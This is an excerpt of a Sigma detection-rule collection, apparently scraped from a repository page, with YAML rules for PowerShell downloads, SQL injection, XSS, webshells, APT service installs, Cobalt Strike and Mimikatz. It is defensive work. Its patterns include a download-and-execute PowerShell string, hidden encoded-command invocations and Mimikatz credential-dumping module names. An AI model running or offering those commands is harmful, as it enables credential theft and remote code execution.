  23. level: high
  24. tags:
  25.   - attack.defense_evasion
  26.   - attack.command_and_control
  27.   - attack.t1071.001

Windows PowerShell User Agent

  1. title: Windows PowerShell User Agent
  2. id: c8557060-9221-4448-8794-96320e6f3e74
  3. status: test
  4. description: Detects Windows PowerShell Web Access
  5. author: Florian Roth
  6. references:
  7.   - https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest
  8. date: 2017/03/13
  9. modified: 2021/11/27
  10. logsource:
  11.   category: proxy
  12. detection:
  13.   selection:
  14.     c-useragent|contains: ' WindowsPowerShell/'
  15.   condition: selection
  16. fields:
  17.   - ClientIP
  18.   - c-uri
  19.   - c-useragent
  20. falsepositives:
  21.   - Administrative scripts that download files from the Internet
  22.   - Administrative scripts that retrieve certain website contents
  23. level: medium
  24. tags:
  25.   - attack.defense_evasion
  26.   - attack.command_and_control
  27.   - attack.t1071.001

web

web_apache_segfault.yml
web_apache_threading_error.yml
web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml
web_citrix_cve_2019_19781_exploit.yml
web_citrix_cve_2020_8193_8195_exploit.yml
web_cve_2010_5278_exploitation_attempt.yml
web_cve_2018_2894_weblogic_exploit.yml
web_cve_2019_3398_confluence.yml
web_cve_2020_0688_msexchange.yml
web_cve_2020_14882_weblogic_exploit.yml
web_cve_2020_3452_cisco_asa_ftd.yml
web_cve_2020_5902_f5_bigip.yml
web_cve_2021_2109_weblogic_rce_exploit.yml
web_cve_2021_21978_vmware_view_planner_exploit.yml
web_cve_2021_22005_vmware_file_upload.yml
Updateweb_cve_2021_22005_vmware_file_upload.yml
web_cve_2021_22893_pulse_secure_rce_exploit.yml
web_cve_2021_26814_wzuh_rce.yml
web_cve_2021_26858_iis_rce.yml
web_cve_2021_33766_msexchange_proxytoken.yml
web_cve_2021_40539_adselfservice.yml
Updateweb_cve_2021_40539_adselfservice.yml
web_cve_2021_40539_manageengine_adselfservice_exploit.yml
Updateweb_cve_2021_40539_manageengine_adselfservice_exploit.yml
web_cve_2021_41773_apache_path_traversal.yml
web_cve_2021_42237_sitecore_report_ashx.yml
web_cve_2021_43798_grafana.yml
web_cve_2021_44228_log4j.yml
web_cve_2021_44228_log4j_fields.yml
web_exchange_cve_2020_0688_exploit.yml
web_exchange_exploitation_hafnium.yml
web_exchange_proxyshell.yml
web_exchange_proxyshell_successful.yml
web_expl_exchange_cve_2021_28480.yml
web_fortinet_cve_2018_13379_preauth_read_exploit.yml
web_fortinet_cve_2021_22123_exploit.yml
web_iis_tilt_shortname_scan.yml
web_jndi_exploit.yml
web_multiple_suspicious_resp_codes_single_source.yml
web_nginx_core_dump.yml
web_path_traversal_exploitation_attempt.yml
web_pulsesecure_cve_2019_11510.yml
web_solarwinds_cve_2020_10148.yml
web_solarwinds_supernova_webshell.yml
web_sonicwall_jarrewrite_exploit.yml
web_source_code_enumeration.yml
web_terramaster_cve_2020_28188_rce_exploit.yml
web_unc2546_dewmode_php_webshell.yml
web_vsphere_cve_2021_21972_unauth_rce_exploit.yml
win_powershell_snapins_hafnium.yml
win_webshell_regeorg.yml

KeyWords

Detect Sql Injection By Keywords

  1. title: Detect Sql Injection By Keywords
  2. id: 5513deaf-f49a-46c2-a6c8-3f111b5cb453
  3. status: test
  4. description: Detects sql injection that use GET requests by keyword searches in URL strings
  5. author: Saw Win Naung
  6. date: 2020/02/22
  7. modified: 2021/11/27
  8. logsource:
  9.   category: webserver
  10. detection:
  11.   keywords:
  12.     - '=select'
  13.     - '=union'
  14.     - '=concat'
  15.   condition: keywords
  16. fields:
  17.   - client_ip
  18.   - vhost
  19.   - url
  20.   - response
  21. falsepositives:
  22.   - Java scripts and CSS Files
  23.   - User searches in search boxes of the respective website
  24. level: high

Webshell Detection by Keyword

  1. title: Webshell Detection by Keyword
  2. id: 7ff9db12-1b94-4a79-ba68-a2402c5d6729
  3. status: test
  4. description: Detects webshells that use GET requests by keyword searches in URL strings
  5. author: Florian Roth
  6. date: 2017/02/19
  7. modified: 2021/11/27
  8. logsource:
  9.   category: webserver
  10. detection:
  11.   keywords:
  12.     - =whoami
  13.     - =net%20user
  14.     - =cmd%20/c%20
  15.   condition: keywords
  16. fields:
  17.   - client_ip
  18.   - vhost
  19.   - url
  20.   - response
  21. falsepositives:
  22.   - Web sites like wikis with articles on os commands and pages that include the os commands in the URLs
  23.   - User searches in search boxes of the respective website
  24. level: high
  25. tags:
  26.   - attack.persistence
  27.   - attack.t1505.003

Detect XSS Attempts By Keywords

  1. title: Detect XSS Attempts By Keywords
  2. id: 65354b83-a2ea-4ea6-8414-3ab38be0d409
  3. status: experimental
  4. description: Detects XSS that use GET requests by keyword searches in URL strings
  5. author: Saw Win Naung
  6. date: 2021/08/15
  7. logsource:
  8.   category: webserver
  9. detection:
  10.   keywords:
  11.     - '=cookie'
  12.     - '=script'
  13.     - '=onload'
  14.     - '=onmouseover'
  15.   condition: keywords
  16. fields:
  17.   - client_ip
  18.   - vhost
  19.   - url
  20.   - response
  21. falsepositives:
  22.   - Java scripts,CSS Files and PNG files
  23.   - User searches in search boxes of the respective website
  24. level: high

windows

builtin

application

applocker

bits_client

code_integrity

dns_server

driverframeworks

firewall_as

ldap

msexchange

ntlm

printservice

security

servicebus

smbclient

system

win_hack_smbexec.yml
win_invoke_obfuscation_clip_services.yml
win_invoke_obfuscation_obfuscated_iex_services.yml
win_invoke_obfuscation_stdin_services.yml
win_invoke_obfuscation_var_services.yml
win_invoke_obfuscation_via_compress_services.yml
win_invoke_obfuscation_via_rundll_services.yml
win_invoke_obfuscation_via_stdin_services.yml
win_invoke_obfuscation_via_use_clip_services.yml
win_invoke_obfuscation_via_use_mshta_services.yml
win_invoke_obfuscation_via_use_rundll32_services.yml
win_invoke_obfuscation_via_var_services.yml
win_mal_creddumper.yml
win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
win_ntfs_vuln_exploit.yml
win_pcap_drivers.yml
win_possible_zerologon_exploitation_using_wellknown_tools.yml
win_powershell_script_installed_as_service.yml
win_quarkspwdump_clearing_hive_access_history.yml
win_rare_service_installs.yml
win_rdp_potential_cve_2019_0708.yml
win_susp_dhcp_config.yml
win_susp_dhcp_config_failed.yml
win_susp_proceshacker.yml
win_susp_sam_dump.yml
win_susp_system_update_error.yml
win_system_defender_disabled.yml
win_system_susp_eventlog_cleared.yml
win_tap_driver_installation.yml
win_tool_psexec.yml
win_volume_shadow_copy_mount.yml
win_vul_cve_2020_1472.yml
win_vul_cve_2021_42278_or_cve_2021_42287.yml

🙋‍♀️🙋‍♀️🙋‍♀️APT🙋‍♀️🙋‍♀️🙋‍♀️

Turla Service Install
  1. title: Turla Service Install
  2. id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4
  3. status: test
  4. description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
  5. author: Florian Roth
  6. references:
  7.   - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
  8. date: 2017/03/31
  9. modified: 2021/11/30
  10. logsource:
  11.   product: windows
  12.   service: system
  13. detection:
  14.   selection:
  15.     Provider_Name: 'Service Control Manager'
  16.     EventID: 7045
  17.     ServiceName:
  18.       - 'srservice'
  19.       - 'ipvpn'
  20.       - 'hkmsvc'
  21.   condition: selection
  22. falsepositives:
  23.   - Unknown
  24. level: high
  25. tags:
  26.   - attack.persistence
  27.   - attack.g0010
  28.   - attack.t1543.003

Chafer Activity
  1. title: Chafer Activity
  2. id: 53ba33fd-3a50-4468-a5ef-c583635cfa92
  3. description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
  4. status: experimental
  5. references:
  6.     - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/
  7. tags:
  8.     - attack.persistence
  9.     - attack.g0049
  10.     - attack.t1053.005
  11.     - attack.s0111
  12.     - attack.t1543.003
  13.     - attack.defense_evasion
  14.     - attack.t1112
  15.     - attack.command_and_control
  16.     - attack.t1071.004
  17. date: 2018/03/23
  18. modified: 2021/11/30
  19. author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
  20. logsource:
  21.     product: windows
  22.     service: system
  23. detection:
  24.     selection_service:
  25.         Provider_Name: 'Service Control Manager'
  26.         EventID: 7045
  27.         ServiceName:
  28.             - 'SC Scheduled Scan'
  29.             - 'UpdatMachine'
  30.     condition: selection_service
  31. falsepositives:
  32.     - Unknown
  33. level: critical

StoneDrill Service Install
  1. title: StoneDrill Service Install
  2. id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6
  3. status: test
  4. description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
  5. author: Florian Roth
  6. references:
  7.   - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/
  8. date: 2017/03/07
  9. modified: 2021/11/30
  10. logsource:
  11.   product: windows
  12.   service: system
  13. detection:
  14.   selection:
  15.     Provider_Name: 'Service Control Manager'
  16.     EventID: 7045
  17.     ServiceName: NtsSrv
  18.     ServiceFileName|endswith: ' LocalService'
  19.   condition: selection
  20. falsepositives:
  21.   - Unlikely
  22. level: high
  23. tags:
  24.   - attack.persistence
  25.   - attack.g0064
  26.   - attack.t1543.003

Turla PNG Dropper Service
  1. title: Turla PNG Dropper Service
  2. id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1
  3. status: test
  4. description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
  5. author: Florian Roth
  6. references:
  7.   - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/
  8. date: 2018/11/23
  9. modified: 2021/11/30
  10. logsource:
  11.   product: windows
  12.   service: system
  13. detection:
  14.   selection:
  15.     Provider_Name: 'Service Control Manager'
  16.     EventID: 7045
  17.     ServiceName: 'WerFaultSvc'
  18.   condition: selection
  19. falsepositives:
  20.   - unlikely
  21. level: critical
  22. tags:
  23.   - attack.persistence
  24.   - attack.g0010
  25.   - attack.t1543.003

CobaltStrike Service Installations
  1. title: CobaltStrike Service Installations
  2. id: 5a105d34-05fc-401e-8553-272b45c1522d
  3. description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
  4. status: experimental
  5. author: Florian Roth, Wojciech Lesicki
  6. references:
  7.     - https://www.sans.org/webcasts/119395
  8.     - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/
  9.     - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
  10. date: 2021/05/26
  11. modified: 2021/09/30
  12. tags:
  13.     - attack.execution
  14.     - attack.privilege_escalation
  15.     - attack.lateral_movement 
  16.     - attack.t1021.002
  17.     - attack.t1543.003
  18.     - attack.t1569.002
  19. logsource:
  20.     product: windows
  21.     service: system
  22. detection:
  23.     selection_id:
  24.         Provider_Name: 'Service Control Manager'
  25.         EventID: 7045
  26.     selection1:
  27.         ImagePath|contains|all: 
  28.             - 'ADMIN$'
  29.             - '.exe'
  30.     selection2:
  31.         ImagePath|contains|all: 
  32.             - '%COMSPEC%'
  33.             - 'start'
  34.             - 'powershell'
  35.     selection3:
  36.         ImagePath|contains: 'powershell -nop -w hidden -encodedcommand'
  37.     selection4:
  38.         ImagePath|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:"
  39.     condition: selection_id and (selection1 or selection2 or selection3 or selection4)
  40. falsepositives:
  41.     - Unknown
  42. level: critical

Moriya Rootkit
  1. title: Moriya Rootkit
  2. id: 25b9c01c-350d-4b95-bed1-836d04a4f324
  3. description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
  4. status: experimental
  5. author: Bhabesh Raj
  6. date: 2021/05/06
  7. modified: 2021/11/30
  8. references:
  9.     - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
  10. tags:
  11.     - attack.persistence
  12.     - attack.privilege_escalation
  13.     - attack.t1543.003
  14. logsource:
  15.     product: windows
  16.     service: system
  17. detection:
  18.     selection:
  19.         Provider_Name: 'Service Control Manager'
  20.         EventID: 7045
  21.         ServiceName: ZzNetSvc
  22.     condition: selection
  23. level: critical
  24. falsepositives:
  25.     - None

taskscheduler

Rare Scheduled Task Creations
  1. title: Rare Scheduled Task Creations
  2. id: b20f6158-9438-41be-83da-a5a16ac90c2b
  3. status: test
  4. description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
  5. author: Florian Roth
  6. date: 2017/03/17
  7. modified: 2021/12/28
  8. logsource:
  9.   product: windows
  10.   service: taskscheduler
  11. detection:
  12.   selection:
  13.     EventID: 106
  14.   filter1:
  15.     TaskName: 
  16.       - \Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan
  17.   timeframe: 7d
  18.   condition: selection and not 1 of filter* | count() by TaskName < 5
  19. falsepositives:
  20.   - Software installation
  21. level: low
  22. tags:
  23.   - attack.persistence
  24.   - attack.s0111
  25.   - attack.t1053.005

windefend

wmi

Mimikatz Use

  1. title: Mimikatz Use
  2. id: 06d71506-7beb-4f22-8888-e2e5e2ca7fd8
  3. description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
  4. status: experimental
  5. author: Florian Roth (rule), David ANDRE (additional keywords)
  6. date: 2017/01/10
  7. modified: 2022/01/05
  8. references:
  9.     - https://tools.thehacker.recipes/mimikatz/modules
  10. tags:
  11.     - attack.s0002
  12.     - attack.lateral_movement
  13.     - attack.credential_access
  14.     - car.2013-07-001
  15.     - car.2019-04-004
  16.     - attack.t1003.002
  17.     - attack.t1003.004
  18.     - attack.t1003.001
  19.     - attack.t1003.006
  20. logsource:
  21.     product: windows
  22. detection:
  23.     keywords:
  24.         - 'dpapi::masterkey'
  25.         - 'eo.oe.kiwi'
  26.         - 'event::clear'
  27.         - 'event::drop'
  28.         - 'gentilkiwi.com'
  29.         - 'kerberos::golden'
  30.         - 'kerberos::ptc'
  31.         - 'kerberos::ptt'
  32.         - 'kerberos::tgt'
  33.         - 'Kiwi Legit Printer'
  34.         - 'lsadump::'
  35.         - 'mimidrv.sys'
  36.         - '\mimilib.dll'
  37.         - 'misc::printnightmare'
  38.         - 'misc::shadowcopies'
  39.         - 'misc::skeleton'
  40.         - 'privilege::backup'
  41.         - 'privilege::debug'
  42.         - 'privilege::driver'
  43.         - 'sekurlsa::'
  44.     filter:
  45.         EventID: 15  # Sysmon's FileStream Events (could cause false positives when Sigma rules get copied on/to a system)
  46.     condition: keywords and not filter
  47. falsepositives:
  48.     - Naughty administrators
  49.     - Penetration test
  50.     - AV Signature updates
  51.     - Files with Mimikatz in their filename
  52. level: critical

create_remote_thread

CobaltStrike Process Injection

  1. title: CobaltStrike Process Injection
  2. id: 6309645e-122d-4c5b-bb2b-22e4f9c2fa42
  3. description: Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons
  4. references:
  5.     - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f
  6.     - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/
  7. tags:
  8.     - attack.defense_evasion
  9.     - attack.t1055.001
  10. status: experimental
  11. author: Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community
  12. date: 2018/11/30
  13. modified: 2021/11/20
  14. logsource:
  15.     product: windows
  16.     category: create_remote_thread
  17. detection:
  18.     selection:
  19.         StartAddress|endswith: 
  20.             - '0B80'
  21.             - '0C7C'
  22.             - '0C88'
  23.     condition: selection
  24. falsepositives:
  25.     - unknown
  26. level: high

CreateRemoteThread API and LoadLibrary

  1. title: CreateRemoteThread API and LoadLibrary
  2. id: 052ec6f6-1adc-41e6-907a-f1c813478bee
  3. status: test
  4. description: Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
  5. author: Roberto Rodriguez @Cyb3rWard0g
  6. references:
  7.   - https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html
  8. date: 2019/08/11
  9. modified: 2021/11/27
  10. logsource:
  11.   product: windows
  12.   category: create_remote_thread
  13. detection:
  14.   selection:
  15.     StartModule|endswith: '\kernel32.dll'
  16.     StartFunction: 'LoadLibraryA'
  17.   condition: selection
  18. falsepositives:
  19.   - Unknown
  20. level: critical
  21. tags:
  22.   - attack.defense_evasion
  23.   - attack.t1055.001

Accessing WinAPI in PowerShell. Code Injection.

  1. title: Accessing WinAPI in PowerShell. Code Injection.
  2. id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50
  3. status: test
  4. description: Detecting Code injection with PowerShell in another process
  5. author: Nikita Nazarov, oscd.community
  6. references:
  7.   - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
  8. date: 2020/10/06
  9. modified: 2021/11/27
  10. logsource:
  11.   product: windows
  12.   category: create_remote_thread
  13.   definition: 'Note that you have to configure logging for CreateRemoteThread in Symson config'
  14. detection:
  15.   selection:
  16.     SourceImage|endswith: '\powershell.exe'
  17.   condition: selection
  18. falsepositives:
  19.   - Unknown
  20. level: high
  21. tags:
  22.   - attack.execution
  23.   - attack.t1059.001

PowerShell Rundll32 Remote Thread Creation

  1. title: PowerShell Rundll32 Remote Thread Creation
  2. id: 99b97608-3e21-4bfe-8217-2a127c396a0e
  3. status: experimental
  4. description: Detects PowerShell remote thread creation in Rundll32.exe
  5. author: Florian Roth
  6. references:
  7.     - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
  8. date: 2018/06/25
  9. modified: 2021/11/12
  10. logsource:
  11.     product: windows
  12.     category: create_remote_thread
  13. detection:
  14.     selection:
  15.         SourceImage|endswith: '\powershell.exe'
  16.         TargetImage|endswith: '\rundll32.exe'
  17.     condition: selection
  18. tags:
  19.     - attack.defense_evasion
  20.     - attack.execution
  21.     - attack.t1218.011
  22.     - attack.t1059.001
  23. falsepositives:
  24.     - Unknown
  25. level: high

Suspicious Remote Thread Created

  1. title: Suspicious Remote Thread Created
  2. id: 66d31e5f-52d6-40a4-9615-002d3789a119
  3. description: Offensive tradecraft is switching away from using APIs like "CreateRemoteThread", however, this is still largely observed in the wild. This rule aims
  4.     to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes. It is
  5.     a generalistic rule, but it should have a low FP ratio due to the selected range of processes.
  6. notes:
  7.     - MonitoringHost.exe is a process that loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools.
  8. status: experimental
  9. date: 2019/10/27
  10. modified: 2021/06/27
  11. author: Perez Diego (@darkquassar), oscd.community
  12. references:
  13.     - Personal research, statistical analysis
  14.     - https://lolbas-project.github.io
  15. logsource:
  16.     product: windows
  17.     category: create_remote_thread
  18. tags:
  19.     - attack.privilege_escalation
  20.     - attack.defense_evasion
  21.     - attack.t1055
  22. detection:
  23.     selection: 
  24.         SourceImage|endswith:
  25.             - '\bash.exe'
  26.             - '\cvtres.exe'
  27.             - '\defrag.exe'
  28.             - '\dnx.exe'
  29.             - '\esentutl.exe'
  30.             - '\excel.exe'
  31.             - '\expand.exe'
  32.             - '\explorer.exe'
  33.             - '\find.exe'
  34.             - '\findstr.exe'
  35.             - '\forfiles.exe'
  36.             - '\git.exe'
  37.             - '\gpupdate.exe'
  38.             - '\hh.exe'
  39.             - '\iexplore.exe'
  40.             - '\installutil.exe'
  41.             - '\lync.exe'
  42.             - '\makecab.exe'
  43.             - '\mDNSResponder.exe'
  44.             - '\monitoringhost.exe'
  45.             - '\msbuild.exe'
  46.             - '\mshta.exe'
  47.             - '\msiexec.exe'
  48.             - '\mspaint.exe'
  49.             - '\outlook.exe'
  50.             - '\ping.exe'
  51.             - '\powerpnt.exe'
  52.             - '\powershell.exe'
  53.             - '\provtool.exe'
  54.             - '\python.exe'
  55.             - '\regsvr32.exe'
  56.             - '\robocopy.exe'
  57.             - '\runonce.exe'
  58.             - '\sapcimc.exe'
  59.             - '\schtasks.exe'
  60.             - '\smartscreen.exe'
  61.             - '\spoolsv.exe'
  62.             # - '\taskhost.exe'  # disabled due to false positives
  63.             - '\tstheme.exe'
  64.             - '\userinit.exe'
  65.             - '\vssadmin.exe'
  66.             - '\vssvc.exe'
  67.             - '\w3wp.exe'       
  68.             - '\winlogon.exe'
  69.             - '\winscp.exe'
  70.             - '\wmic.exe'
  71.             - '\word.exe'
  72.             - '\wscript.exe'
  73.     filter:
  74.         SourceImage|contains: 'Visual Studio'
  75.     condition: selection and not filter
  76. fields:
  77.     - ComputerName
  78.     - User
  79.     - SourceImage
  80.     - TargetImage
  81. level: high
  82. falsepositives:
  83.     - Unknown

Password Dumper Remote Thread in LSASS

  1. title: Password Dumper Remote Thread in LSASS
  2. id: f239b326-2f41-4d6b-9dfa-c846a60ef505
  3. description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.
  4. references:
  5.     - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm
  6. status: stable
  7. author: Thomas Patzke
  8. date: 2017/02/19
  9. modified: 2021/06/21
  10. logsource:
  11.     product: windows
  12.     category: create_remote_thread
  13. detection:
  14.     selection:
  15.         TargetImage|endswith: '\lsass.exe'
  16.         StartModule: ''
  17.     condition: selection
  18. tags:
  19.     - attack.credential_access
  20.     - attack.s0005
  21.     - attack.t1003.001
  22. falsepositives:
  23.     - Antivirus products
  24. level: high

CACTUSTORCH Remote Thread Creation

  1. title: CACTUSTORCH Remote Thread Creation
  2. id: 2e4e488a-6164-4811-9ea1-f960c7359c40
  3. description: Detects remote thread creation from CACTUSTORCH as described in references.
  4. references:
  5.     - https://twitter.com/SBousseaden/status/1090588499517079552
  6.     - https://github.com/mdsecactivebreach/CACTUSTORCH
  7. status: experimental
  8. author: '@SBousseaden (detection), Thomas Patzke (rule)'
  9. date: 2019/02/01
  10. modified: 2021/11/12
  11. logsource:
  12.     product: windows
  13.     category: create_remote_thread
  14. detection:
  15.     selection:
  16.         SourceImage|endswith:
  17.             - '\System32\cscript.exe'
  18.             - '\System32\wscript.exe'
  19.             - '\System32\mshta.exe'
  20.             - '\winword.exe'
  21.             - '\excel.exe'
  22.         TargetImage|contains: '\SysWOW64\'
  23.         StartModule: null
  24.     condition: selection
  25. tags:
  26.     - attack.defense_evasion
  27.     - attack.t1055.012
  28.     - attack.execution
  29.     - attack.t1059.005
  30.     - attack.t1059.007
  31.     - attack.t1218.005
  32. falsepositives:
  33.     - unknown
  34. level: high

create_stream_hash

sysmon_ads_executable.yml
sysmon_regedit_export_to_ads.yml

deprecated

powershell_suspicious_download.yml
powershell_suspicious_invocation_generic.yml
powershell_suspicious_invocation_specific.yml
powershell_syncappvpublishingserver_exe.yml
process_creation_syncappvpublishingserver_exe.yml
sysmon_mimikatz_detection_lsass.yml
sysmon_rclone_execution.yml
win_susp_esentutl_activity.yml
win_susp_rclone_exec.yml
win_susp_vssadmin_ntds_activity.yml

dns_query

dns_query_win_gotoopener.yml
dns_query_win_hybridconnectionmgr_servicebus.yml
dns_query_win_lobas_appinstaller.yml
dns_query_win_logmein.yml
dns_query_win_mal_cobaltstrike.yml
dns_query_win_mega_nz.yml
dns_query_win_possible_dns_rebinding.yml
dns_query_win_regsvr32_network_activity.yml
dns_query_win_susp_ipify.yml
dns_query_win_susp_teamviewer.yml
dns_query_win_tor_onion.yml

driver_load

driver_load_mal_creddumper.yml
driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
driver_load_powershell_script_installed_as_service.yml
driver_load_susp_temp_use.yml
driver_load_vuln_dell_driver.yml
driver_load_windivert.yml

etw/file_rename

file_rename_win_not_dll_to_dll.yml

file_delete

file_delete_win_cve_2021_1675_printspooler_del.yml
file_delete_win_delete_appli_log.yml
file_delete_win_delete_backup_file.yml
file_delete_win_delete_prefetch.yml
file_delete_win_sysinternals_sdelete_file_deletion.yml

file_event

file_event_win_access_susp_unattend_xml.yml
file_event_win_advanced_ip_scanner.yml
file_event_win_anydesk_artefact.yml
file_event_win_apt_unidentified_nov_18.yml
file_event_win_creation_new_shim_database.yml
file_event_win_creation_scr_binary_file.yml
file_event_win_creation_system_file.yml
file_event_win_creation_unquoted_service_path.yml
file_event_win_cred_dump_tools_dropped_files.yml
file_event_win_csharp_compile_artefact.yml
file_event_win_cve_2021_1675_printspooler.yml
file_event_win_cve_2021_26858_msexchange.yml
file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml
file_event_win_cve_2021_41379_msi_lpe.yml
file_event_win_detect_powerup_dllhijacking.yml
file_event_win_ghostpack_safetykatz.yml
file_event_win_gotoopener_artefact.yml
file_event_win_hack_dumpert.yml
file_event_win_hivenightmare_file_exports.yml
file_event_win_hktl_createminidump.yml
file_event_win_hktl_nppspy.yml
file_event_win_install_teamviewer_desktop.yml
file_event_win_iso_file_recent.yml
file_event_win_lsass_dump.yml
file_event_win_lsass_memory_dump_file_creation.yml
file_event_win_mal_adwind.yml
file_event_win_mal_octopus_scanner.yml
file_event_win_mal_vhd_download.yml
file_event_win_mimikatz_kirbi_file_creation.yml
ile_event_win_mimimaktz_memssp_log_file.yml
file_event_win_office_persistence.yml
file_event_win_outlook_c2_macro_creation.yml
file_event_win_outlook_newform.yml
file_event_win_pcre_net_temp_file.yml
file_event_win_pingback_backdoor.yml
file_event_win_powershell_exploit_scripts.yml
file_event_win_powershell_startup_shortcuts.yml
file_event_win_quarkspw_filedump.yml
file_event_win_rclone_exec_file.yml
file_event_win_redmimicry_winnti_filedrop.yml
file_event_win_sam_dump.yml
file_event_win_screenconnect_artefact.yml
file_event_win_script_creation_by_office_using_file_ext.yml
file_event_win_susp_adsi_cache_usage.yml
file_event_win_susp_clr_logs.yml
file_event_win_susp_colorcpl.yml
file_event_win_susp_desktop_ini.yml
file_event_win_susp_desktop_txt.yml
file_event_win_susp_desktopimgdownldr_file.yml
file_event_win_susp_exchange_aspx_write.yml
file_event_win_susp_ntds_dit.yml
file_event_win_susp_pfx_file_creation.yml
file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml
file_event_win_susp_system_interactive_powershell.yml
file_event_win_susp_task_write.yml
file_event_win_susp_teamviewer_remote_session.yml
file_event_win_suspicious_powershell_profile_create.yml
file_event_win_tool_psexec.yml
file_event_win_tsclient_filewrite_startup.yml
file_event_win_uac_bypass_consent_comctl32.yml
file_event_win_uac_bypass_dotnet_profiler.yml
file_event_win_uac_bypass_ieinstal.yml
file_event_win_uac_bypass_msconfig_gui.yml
file_event_win_uac_bypass_ntfs_reparse_point.yml
file_event_win_uac_bypass_winsat.yml
file_event_win_uac_bypass_wmp.yml
file_event_win_webshell_creation_detect.yml
file_event_win_win_cscript_wscript_dropper.yml
file_event_win_win_shell_write_susp_directory.yml
file_event_win_winrm_awl_bypass.yml
file_event_win_winword_cve_2021_40444.yml
file_event_win_wmi_persistence_script_event_consumer_write.yml
file_event_win_wmiprvse_wbemcomn_dll_hijack.yml
file_event_win_writing_local_admin_share.yml

Startup Folder File Write

  1. title: Startup Folder File Write
  2. id: 2aa0a6b4-a865-495b-ab51-c28249537b75
  3. status: test
  4. description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
  5. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
  6. references:
  7.   - https://github.com/OTRF/detection-hackathon-apt29/issues/12
  8.   - https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html
  9. date: 2020/05/02
  10. modified: 2021/11/27
  11. logsource:
  12.   product: windows
  13.   category: file_event
  14. detection:
  15.   selection:
  16.     TargetFilename|contains: 'ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
  17.   condition: selection
  18. falsepositives:
  19.   - unknown
  20. level: low
  21. tags:
  22.   - attack.persistence
  23.   - attack.t1547.001

PowerShell Writing Startup Shortcuts

  1. title: PowerShell Writing Startup Shortcuts
  2. id: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d
  3. description: Attempts to detect PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
  4. status: experimental
  5. references: 
  6.     - https://redcanary.com/blog/intelligence-insights-october-2021/
  7.     - https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder
  8. tags:
  9.     - attack.registry_run_keys_/_startup_folder
  10.     - attack.t1547.001
  11. date: 2021/10/24
  12. author: Christopher Peacock '@securepeacock', SCYTHE
  13. level: high
  14. logsource:
  15.     product: windows
  16.     category: file_event
  17. detection:
  18.     selection:
  19.         Image|endswith: '\powershell.exe'
  20.         TargetFilename|contains: '\start menu\programs\startup\'
  21.         TargetFilename|endswith: '.lnk'
  22.     condition: selection
  23. falsepositives:
  24.     - Unknown
  25.     - Depending on your environment accepted applications may leverage this at times. It is recomended to search for anomolies inidicative of malware.

Moriya Rootkit

  1. title: Moriya Rootkit
  2. id: a1507d71-0b60-44f6-b17c-bf53220fdd88
  3. related:
  4.     - id: 25b9c01c-350d-4b95-bed1-836d04a4f324
  5.       type: derived
  6. description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
  7. status: experimental
  8. author: Bhabesh Raj
  9. date: 2021/05/06
  10. modified: 2021/09/21
  11. references:
